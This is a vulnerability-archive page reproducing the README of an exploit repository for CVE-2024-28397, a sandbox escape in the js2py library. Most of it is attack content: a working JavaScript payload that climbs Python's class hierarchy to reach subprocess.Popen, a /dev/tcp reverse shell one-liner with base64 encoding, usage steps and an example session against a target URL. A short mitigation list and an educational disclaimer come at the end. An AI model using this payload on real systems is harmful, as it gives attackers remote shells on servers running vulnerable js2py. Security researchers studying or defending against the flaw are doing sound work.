Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2024-28397 PoC — Js2Py 安全漏洞

Source
https://github.com/0xDTC/js2py-Sandbox-Escape-CVE-2024-28397-RCE
Associated Vulnerability
Title:Js2Py 安全漏洞 (CVE-2024-28397)
Description:An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Readme
# CVE-2024-28397 js2py Sandbox Escape Exploit

A collection of exploit scripts targeting the js2py sandbox escape vulnerability (CVE-2024-28397) that allows arbitrary code execution through Python object introspection.

## 🔍 Vulnerability Overview

The js2py library contains a critical sandbox escape vulnerability that allows attackers to execute arbitrary Python code by accessing internal Python objects through JavaScript's `Object.getOwnPropertyNames()` method.

### Technical Details

- **CVE ID**: CVE-2024-28397
- **Affected Library**: js2py (JavaScript to Python translator)
- **Attack Vector**: Sandbox escape via Python object introspection
- **Impact**: Remote Code Execution (RCE)

## 📋 Reference Analysis

This exploit is based on the comprehensive analysis by Marven11:
- **Analysis Document**: [CVE-2024-28397 js2py Sandbox Escape Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)

## 🛠️ Exploit Scripts

This repository contains three different implementations:

### 1. Bash Script (`exploit.sh`)
Lightweight bash implementation using curl and jq.

### 2. Go Script (`exploit.go`)
Cross-platform Go implementation with built-in HTTP client.

## 🚀 Quick Start

### Prerequisites
- **For Bash script**: `curl`, `jq`, `base64`
- **For Go script**: Go 1.16+

### Usage

All scripts are interactive and will prompt for required information:

```bash
# Bash version
chmod +x exploit.sh
./exploit.sh

# Go version
go run exploit.go
```

### Interactive Prompts

Each script will ask for:
1. **Target URL**: The endpoint running vulnerable js2py code
2. **Your IP**: Your machine's IP address for reverse shell
3. **Your Port**: Port number for reverse shell connection

### Example Session

```bash
$ ./exploit.sh
Target URL: http://target.example.com:8000/run_code
Your IP: 10.10.14.3
Your Port: 9001
Sending to http://target.example.com:8000/run_code with reverse shell 10.10.14.3:9001
{"result": "executed"}
```

## 🎯 How It Works

### 1. Payload Generation
The exploit dynamically creates a reverse shell command:
```bash
sh -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1
```

### 2. Base64 Encoding
The shell command is base64-encoded for safe transmission:
```bash
base64_payload=$(echo -n "$reverse_shell" | base64 -w 0)
```

### 3. JavaScript Sandbox Escape
The core exploit uses JavaScript to access Python's internal objects:

```javascript
let cmd = "printf BASE64_PAYLOAD|base64 -d|bash";
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a,"__class__"), "__base__");
function findpopen(o) {
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if(item.__name__ != "type") {
            let result = findpopen(item);
            if(result) return result;
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
```

### 4. Execution Flow
1. Access Python's object system through `Object.getOwnPropertyNames({})`
2. Navigate to base classes via `__class__.__base__.__getattribute__`
3. Search subclasses for `subprocess.Popen`
4. Execute arbitrary system commands through `Popen`

## 🛡️ Mitigation

- Update js2py to a patched version
- Implement proper input validation and sanitization
- Use secure sandboxing alternatives
- Apply defense-in-depth security measures

## 📚 Educational Purpose

These scripts are provided for educational and authorized testing purposes only. Always ensure you have proper authorization before testing against any systems.

## 🔗 References

- [CVE-2024-28397 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28397)
- [Marven11's Detailed Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)
- [js2py GitHub Repository](https://github.com/PiotrDabkowski/Js2Py)

## ⚖️ Disclaimer

This software is provided for educational and authorized security testing purposes only. Users are responsible for complying with applicable laws and obtaining proper authorization before use.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →